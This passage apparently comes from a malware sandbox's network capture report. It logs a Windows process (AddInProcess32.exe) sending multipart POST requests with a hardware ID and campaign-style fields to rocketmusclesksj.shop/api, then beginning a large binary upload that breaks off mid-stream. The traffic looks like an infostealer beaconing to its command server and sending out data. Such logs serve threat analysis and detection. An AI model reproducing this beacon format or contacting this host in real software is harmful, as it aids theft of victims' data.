2024-04-20 11:23:18 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:18 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ssinnilc59h2m96rd5tivsn3jn; expires=Wed, 14-Aug-2024 05:09:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkRccQerzUvltzr72NErS%2FbKaN%2B%2Fl0Qn5iukjKZwki%2F1fNLU1xc6uaIiKkwaVN2eH0PMkdAM%2BHU5kzSDe25FZO6xIoGGK0eSuk76r1rwKnS0L1bsPEPkFwOuZeGa2%2Fn2RU4J4U4kPrM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2ee0b596748-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 11:23:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:18 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: rocketmusclesksj.shop
2024-04-20 11:23:18 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:18 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-04-20 11:23:19 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5q09eti4bcbfhs947m7dp52efn; expires=Wed, 14-Aug-2024 05:09:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MmY411gm4sd8jBV6Jx427NqeFm%2BBZyOxWXgmSsUWEKZPyiyL%2FSK58%2FDFLEHsyyNtZmkQ0y5ekKB95nwDhI5eLz5HT1WOXdrC6fPN3Vytkp6uFRstWYg%2FPNGek7keKJNASWzXRPJSQn0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2f33d3253ec-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 11:23:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:19 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7079 Host: rocketmusclesksj.shop
2024-04-20 11:23:19 UTC	7079	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:20 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4ufbem80umi3l4c73ep8c9i8an; expires=Wed, 14-Aug-2024 05:09:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYTjFz5p8Bx253Zqv6%2FU5ccZSIuZpp2krPCsHC0NYd1vXRy7U%2BAhFHOwriCRFC9NOhlAFn%2FBIpEolTHYgcfWU7qAX99eK7Cmm84xptv%2FE1g9lqJgz3iPmGIF2vec3H00IAYqVTWXKk4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2f89e57adcf-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 11:23:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:20 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1385 Host: rocketmusclesksj.shop
2024-04-20 11:23:20 UTC	1385	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:20 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4je8kdj2ra37nlfsq3dq374fam; expires=Wed, 14-Aug-2024 05:09:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1%2BFBWMtPHd8C2Z%2Fi2EZRdsKOapHFf5B9AxTKz2h8Zql%2F8BZp60hzD%2BBW1reVMEudXoA96xw2ZzS8SDk1ZnW7X3lOxIgIBwA7HJhmWNv3SCFq5BW0z%2BYzFEAsZu3Nvvca87vFsiZ2W4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c2fd5bd51371-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 11:23:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a Data Ascii: fok 81.181.57.52
2024-04-20 11:23:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	172.67.129.243	443	7984	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:23:22 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 588083 Host: rocketmusclesksj.shop
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 34 46 35 36 33 30 34 38 43 31 34 35 30 33 46 39 46 44 32 42 45 32 43 39 32 35 30 44 46 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 39 39 4d 75 41 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CD4F563048C14503F9FD2BE2C9250DFD--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"A99MuA----b
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77 af 27 1f fc e4 ba 9a 52 16 d8 e9 a6 c2 77 9f Data Ascii: v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w'Rw
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3 db a5 37 a5 a3 c2 7d a7 ae 01 33 11 99 e5 c6 Data Ascii: X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu'BL r6{MZ\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}7}3
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2 da 06 58 4d 5e f0 29 88 90 fb b4 a8 84 27 3d Data Ascii: K'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'\|<z a.yR[G(XM^)'=
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96 2b c3 69 9d e2 49 3c 0c 88 17 88 2d 0e a2 08 Data Ascii: L/Z_qI{k]h(I7O("\|"8E?G:i+kMbPyOb'n4^svg6G~I5i3-G#bc<Pe28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!+iI<-
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f 46 49 6b f0 64 eb 15 9e c0 bd 80 05 55 f9 5e 24 d2 fc c8 a9 ca 99 ea e1 03 af 74 77 7d 75 ee Data Ascii: J_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^9fQ5qlr>2\|{`_N.euDEk~LI:[p!#OP\|hd\8l`keM},T Gib.4P69=`F?FIkdU^$tw}u
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41 10 06 3e 84 c1 bf db 85 17 40 fc 99 4a cf 16 b4 19 ab f2 e3 a3 1f 7f 3b 9e 2e 00 2e fd 60 c7 Data Ascii: mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO\|?<%CwJA>@J;..`
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16 84 87 05 a1 3f 69 74 f7 e0 cf 42 8c 55 ff 99 ad 09 ff 53 55 7c c1 67 7a 02 9a 6e 7d 4b 1b f9 Data Ascii: JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\??itBUSU\|gzn}K
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6 c7 a9 9e cf 63 29 1e 7e ef 0a 68 19 38 83 c5 f1 91 8d 13 fc d6 1f c3 68 5d 12 26 df bf 89 b5 Data Ascii: PAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa\|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]xc)~h8h]&
2024-04-20 11:23:22 UTC	15331	OUT	Data Raw: 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33 ee ca b3 96 ff a0 cf fe 83 76 8d 90 9a ad 16 ed 58 fb c6 ea 9b 29 4d fb d8 17 f0 44 ba 30 